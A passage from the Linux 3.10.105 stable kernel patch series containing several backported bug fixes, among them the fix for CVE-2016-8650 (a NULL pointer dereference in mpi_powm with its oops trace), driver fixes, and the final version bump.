ADT7411_CFG1_RESERVED_BIT3 + | ADT7411_CFG1_START_MONITOR, 1); if (ret < 0) return ret; From 940d1175de7c31e8e2ac20489b7d2df4963bb4da Mon Sep 17 00:00:00 2001 From: Andrey Ryabinin Date: Thu, 24 Nov 2016 13:23:10 +0000 Subject: [PATCH 308/315] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] commit f5527fffff3f002b0a6b376163613b82f69de073 upstream. This fixes CVE-2016-8650. If mpi_powm() is given a zero exponent, it wants to immediately return either 1 or 0, depending on the modulus. However, if the result was initalised with zero limb space, no limbs space is allocated and a NULL-pointer exception ensues. Fix this by allocating a minimal amount of limb space for the result when the 0-exponent case when the result is 1 and not touching the limb space when the result is 0. This affects the use of RSA keys and X.509 certificates that carry them. BUG: unable to handle kernel NULL pointer dereference at (null) IP: [] mpi_powm+0x32/0x7e6 PGD 0 Oops: 0002 [#1] SMP Modules linked in: CPU: 3 PID: 3014 Comm: keyctl Not tainted 4.9.0-rc6-fscache+ #278 Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014 task: ffff8804011944c0 task.stack: ffff880401294000 RIP: 0010:[] [] mpi_powm+0x32/0x7e6 RSP: 0018:ffff880401297ad8 EFLAGS: 00010212 RAX: 0000000000000000 RBX: ffff88040868bec0 RCX: ffff88040868bba0 RDX: ffff88040868b260 RSI: ffff88040868bec0 RDI: ffff88040868bee0 RBP: ffff880401297ba8 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000047 R11: ffffffff8183b210 R12: 0000000000000000 R13: ffff8804087c7600 R14: 000000000000001f R15: ffff880401297c50 FS: 00007f7a7918c700(0000) GS:ffff88041fb80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 0000000401250000 CR4: 00000000001406e0 Stack: ffff88040868bec0 0000000000000020 ffff880401297b00 ffffffff81376cd4 0000000000000100 ffff880401297b10 ffffffff81376d12 ffff880401297b30 ffffffff81376f37 0000000000000100 0000000000000000 ffff880401297ba8 Call Trace: [] ? __sg_page_iter_next+0x43/0x66 [] ? sg_miter_get_next_page+0x1b/0x5d [] ? sg_miter_next+0x17/0xbd [] ? mpi_read_raw_from_sgl+0xf2/0x146 [] rsa_verify+0x9d/0xee [] ? pkcs1pad_sg_set_buf+0x2e/0xbb [] pkcs1pad_verify+0xc0/0xe1 [] public_key_verify_signature+0x1b0/0x228 [] x509_check_for_self_signed+0xa1/0xc4 [] x509_cert_parse+0x167/0x1a1 [] x509_key_preparse+0x21/0x1a1 [] asymmetric_key_preparse+0x34/0x61 [] key_create_or_update+0x145/0x399 [] SyS_add_key+0x154/0x19e [] do_syscall_64+0x80/0x191 [] entry_SYSCALL64_slow_path+0x25/0x25 Code: 56 41 55 41 54 53 48 81 ec a8 00 00 00 44 8b 71 04 8b 42 04 4c 8b 67 18 45 85 f6 89 45 80 0f 84 b4 06 00 00 85 c0 75 2f 41 ff ce <49> c7 04 24 01 00 00 00 b0 01 75 0b 48 8b 41 18 48 83 38 01 0f RIP [] mpi_powm+0x32/0x7e6 RSP CR2: 0000000000000000 ---[ end trace d82015255d4a5d8d ]--- Basically, this is a backport of a libgcrypt patch: http://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=patch;h=6e1adb05d290aeeb1c230c763970695f4a538526 Fixes: cdec9cb5167a ("crypto: GnuPG based MPI lib - source files (part 1)") Signed-off-by: Andrey Ryabinin Signed-off-by: David Howells cc: Dmitry Kasatkin cc: linux-ima-devel@lists.sourceforge.net Signed-off-by: James Morris Signed-off-by: Willy Tarreau --- lib/mpi/mpi-pow.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/mpi/mpi-pow.c b/lib/mpi/mpi-pow.c index 5464c8744ea..e24388a863a 100644 --- a/lib/mpi/mpi-pow.c +++ b/lib/mpi/mpi-pow.c @@ -64,8 +64,13 @@ int mpi_powm(MPI res, MPI base, MPI exp, MPI mod) if (!esize) { /* Exponent is zero, result is 1 mod MOD, i.e., 1 or 0 * depending on if MOD equals 1. */ - rp[0] = 1; res->nlimbs = (msize == 1 && mod->d[0] == 1) ? 0 : 1; + if (res->nlimbs) { + if (mpi_resize(res, 1) < 0) + goto enomem; + rp = res->d; + rp[0] = 1; + } res->sign = 0; goto leave; } From a28d835844a523e0e0a96eb25b10a037b7662f1f Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 4 Aug 2016 08:26:56 +0300 Subject: [PATCH 309/315] mfd: 88pm80x: Double shifting bug in suspend/resume commit 9a6dc644512fd083400a96ac4a035ac154fe6b8d upstream. set_bit() and clear_bit() take the bit number so this code is really doing "1 << (1 << irq)" which is a double shift bug. It's done consistently so it won't cause a problem unless "irq" is more than 4. Fixes: 70c6cce04066 ('mfd: Support 88pm80x in 80x driver') Signed-off-by: Dan Carpenter Signed-off-by: Lee Jones Signed-off-by: Willy Tarreau --- include/linux/mfd/88pm80x.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/include/linux/mfd/88pm80x.h b/include/linux/mfd/88pm80x.h index e94537befab..b55c95dd874 100644 --- a/include/linux/mfd/88pm80x.h +++ b/include/linux/mfd/88pm80x.h @@ -345,7 +345,7 @@ static inline int pm80x_dev_suspend(struct device *dev) int irq = platform_get_irq(pdev, 0); if (device_may_wakeup(dev)) - set_bit((1 << irq), &chip->wu_flag); + set_bit(irq, &chip->wu_flag); return 0; } @@ -357,7 +357,7 @@ static inline int pm80x_dev_resume(struct device *dev) int irq = platform_get_irq(pdev, 0); if (device_may_wakeup(dev)) - clear_bit((1 << irq), &chip->wu_flag); + clear_bit(irq, &chip->wu_flag); return 0; } From bc90bffda9c784885e35d53d077c6486c9ea1d2a Mon Sep 17 00:00:00 2001 From: Peter Ujfalusi Date: Tue, 23 Aug 2016 10:27:19 +0300 Subject: [PATCH 310/315] ASoC: omap-mcpdm: Fix irq resource handling commit a8719670687c46ed2e904c0d05fa4cd7e4950cd1 upstream. Fixes: ddd17531ad908 ("ASoC: omap-mcpdm: Clean up with devm_* function") Managed irq request will not doing any good in ASoC probe level as it is not going to free up the irq when the driver is unbound from the sound card. Signed-off-by: Peter Ujfalusi Reported-by: Russell King Signed-off-by: Mark Brown Signed-off-by: Willy Tarreau --- sound/soc/omap/omap-mcpdm.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/sound/soc/omap/omap-mcpdm.c b/sound/soc/omap/omap-mcpdm.c index eb05c7ed6d0..5dc6b23b634 100644 --- a/sound/soc/omap/omap-mcpdm.c +++ b/sound/soc/omap/omap-mcpdm.c @@ -393,8 +393,8 @@ static int omap_mcpdm_probe(struct snd_soc_dai *dai) pm_runtime_get_sync(mcpdm->dev); omap_mcpdm_write(mcpdm, MCPDM_REG_CTRL, 0x00); - ret = devm_request_irq(mcpdm->dev, mcpdm->irq, omap_mcpdm_irq_handler, - 0, "McPDM", (void *)mcpdm); + ret = request_irq(mcpdm->irq, omap_mcpdm_irq_handler, 0, "McPDM", + (void *)mcpdm); pm_runtime_put_sync(mcpdm->dev); @@ -414,6 +414,7 @@ static int omap_mcpdm_remove(struct snd_soc_dai *dai) { struct omap_mcpdm *mcpdm = snd_soc_dai_get_drvdata(dai); + free_irq(mcpdm->irq, (void *)mcpdm); pm_runtime_disable(mcpdm->dev); return 0; From 7fbbad139de7e3de9c88a8bbdd9f5671e2ae69ed Mon Sep 17 00:00:00 2001 From: Jan Remmet Date: Fri, 23 Sep 2016 10:52:00 +0200 Subject: [PATCH 311/315] regulator: tps65910: Work around silicon erratum SWCZ010 commit 8f9165c981fed187bb483de84caf9adf835aefda upstream. http://www.ti.com/lit/pdf/SWCZ010: DCDC o/p voltage can go higher than programmed value Impact: VDDI, VDD2, and VIO output programmed voltage level can go higher than expected or crash, when coming out of PFM to PWM mode or using DVFS. Description: When DCDC CLK SYNC bits are 11/01: * VIO 3-MHz oscillator is the source clock of the digital core and input clock of VDD1 and VDD2 * Turn-on of VDD1 and VDD2 HSD PFETis synchronized or at a constant phase shift * Current pulled though VCC1+VCC2 is Iload(VDD1) + Iload(VDD2) * The 3 HSD PFET will be turned-on at the same time, causing the highest possible switching noise on the application. This noise level depends on the layout, the VBAT level, and the load current. The noise level increases with improper layout. When DCDC CLK SYNC bits are 00: * VIO 3-MHz oscillator is the source clock of digital core * VDD1 and VDD2 are running on their own 3-MHz oscillator * Current pulled though VCC1+VCC2 average of Iload(VDD1) + Iload(VDD2) * The switching noise of the 3 SMPS will be randomly spread over time, causing lower overall switching noise. Workaround: Set DCDCCTRL_REG[1:0]= 00. Signed-off-by: Jan Remmet Signed-off-by: Mark Brown Signed-off-by: Willy Tarreau --- drivers/regulator/tps65910-regulator.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/regulator/tps65910-regulator.c b/drivers/regulator/tps65910-regulator.c index 45c16447744..1ed4145164d 100644 --- a/drivers/regulator/tps65910-regulator.c +++ b/drivers/regulator/tps65910-regulator.c @@ -1080,6 +1080,12 @@ static int tps65910_probe(struct platform_device *pdev) pmic->num_regulators = ARRAY_SIZE(tps65910_regs); pmic->ext_sleep_control = tps65910_ext_sleep_control; info = tps65910_regs; + /* Work around silicon erratum SWCZ010: output programmed + * voltage level can go higher than expected or crash + * Workaround: use no synchronization of DCDC clocks + */ + tps65910_reg_clear_bits(pmic->mfd, TPS65910_DCDCCTRL, + DCDCCTRL_DCDCCKSYNC_MASK); break; case TPS65911: pmic->get_ctrl_reg = &tps65911_get_ctrl_register; From fa88cd790f2d6e1a0c506b1e38fe8e29080a1e53 Mon Sep 17 00:00:00 2001 From: Bart Van Assche Date: Wed, 31 Aug 2016 15:17:49 -0700 Subject: [PATCH 312/315] dm: mark request_queue dead before destroying the DM device commit 3b785fbcf81c3533772c52b717f77293099498d3 upstream. This avoids that new requests are queued while __dm_destroy() is in progress. [js] use md->queue instead of non-present helper Signed-off-by: Bart Van Assche Signed-off-by: Mike Snitzer Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- drivers/md/dm.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index f69fed826a5..a77ef6cac62 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -2323,6 +2323,7 @@ EXPORT_SYMBOL_GPL(dm_device_name); static void __dm_destroy(struct mapped_device *md, bool wait) { + struct request_queue *q = md->queue; struct dm_table *map; might_sleep(); @@ -2333,6 +2334,10 @@ static void __dm_destroy(struct mapped_device *md, bool wait) set_bit(DMF_FREEING, &md->flags); spin_unlock(&_minor_lock); + spin_lock_irq(q->queue_lock); + queue_flag_set(QUEUE_FLAG_DYING, q); + spin_unlock_irq(q->queue_lock); + /* * Take suspend_lock so that presuspend and postsuspend methods * do not race with internal suspend. From 16654a56f02b36e9377d991853227f598d3bdbf6 Mon Sep 17 00:00:00 2001 From: Max Staudt Date: Mon, 13 Jun 2016 19:15:59 +0200 Subject: [PATCH 313/315] fbdev/efifb: Fix 16 color palette entry calculation commit d50b3f43db739f03fcf8c0a00664b3d2fed0496e upstream. When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green (#50bc50) and neighboring pixels have slightly different values (such as #50bc78). The reason is that fbcon loads its 16 color palette through efifb_setcolreg(), which in turn calculates a 32-bit value to write into memory for each palette index. Until now, this code could only handle 8-bit visuals and didn't mask overlapping values when ORing them. With this patch, fbcon displays the correct colors when a qemu VM is booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16"). Fixes: 7c83172b98e5 ("x86_64 EFI boot support: EFI frame buffer driver") # v2.6.24+ Signed-off-by: Max Staudt Acked-By: Peter Jones Signed-off-by: Tomi Valkeinen Signed-off-by: Willy Tarreau --- drivers/video/efifb.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/video/efifb.c b/drivers/video/efifb.c index 50fe668c617..08dbe8ae021 100644 --- a/drivers/video/efifb.c +++ b/drivers/video/efifb.c @@ -270,9 +270,9 @@ static int efifb_setcolreg(unsigned regno, unsigned red, unsigned green, return 1; if (regno < 16) { - red >>= 8; - green >>= 8; - blue >>= 8; + red >>= 16 - info->var.red.length; + green >>= 16 - info->var.green.length; + blue >>= 16 - info->var.blue.length; ((u32 *)(info->pseudo_palette))[regno] = (red << info->var.red.offset) | (green << info->var.green.offset) | From 63d7f335d653b9a63ecf1f75f73c82f41870a7af Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Fri, 7 Oct 2016 10:40:59 -0700 Subject: [PATCH 314/315] metag: Only define atomic_dec_if_positive conditionally commit 35d04077ad96ed33ceea2501f5a4f1eacda77218 upstream. The definition of atomic_dec_if_positive() assumes that atomic_sub_if_positive() exists, which is only the case if metag specific atomics are used. This results in the following build error when trying to build metag1_defconfig. kernel/ucount.c: In function 'dec_ucount': kernel/ucount.c:211: error: implicit declaration of function 'atomic_sub_if_positive' Moving the definition of atomic_dec_if_positive() into the metag conditional code fixes the problem. Fixes: 6006c0d8ce94 ("metag: Atomics, locks and bitops") Signed-off-by: Guenter Roeck Signed-off-by: James Hogan Signed-off-by: Willy Tarreau --- arch/metag/include/asm/atomic.h | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/metag/include/asm/atomic.h b/arch/metag/include/asm/atomic.h index 307ecd2bd9a..d7d6b9e53e4 100644 --- a/arch/metag/include/asm/atomic.h +++ b/arch/metag/include/asm/atomic.h @@ -38,6 +38,7 @@ #define atomic_dec(v) atomic_sub(1, (v)) #define atomic_inc_not_zero(v) atomic_add_unless((v), 1, 0) +#define atomic_dec_if_positive(v) atomic_sub_if_positive(1, v) #define smp_mb__before_atomic_dec() barrier() #define smp_mb__after_atomic_dec() barrier() @@ -46,8 +47,6 @@ #endif -#define atomic_dec_if_positive(v) atomic_sub_if_positive(1, v) - #include #endif /* __ASM_METAG_ATOMIC_H */ From ec55e7c2bf49a426b6f8204505bd267c77554d37 Mon Sep 17 00:00:00 2001 From: Willy Tarreau Date: Fri, 10 Feb 2017 11:14:46 +0100 Subject: [PATCH 315/315] Linux 3.10.105 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index f6a2cbd438a..80e180e1e4a 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,6 @@ VERSION = 3 PATCHLEVEL = 10 -SUBLEVEL = 104 +SUBLEVEL = 105 EXTRAVERSION = NAME = TOSSUG Baby Fish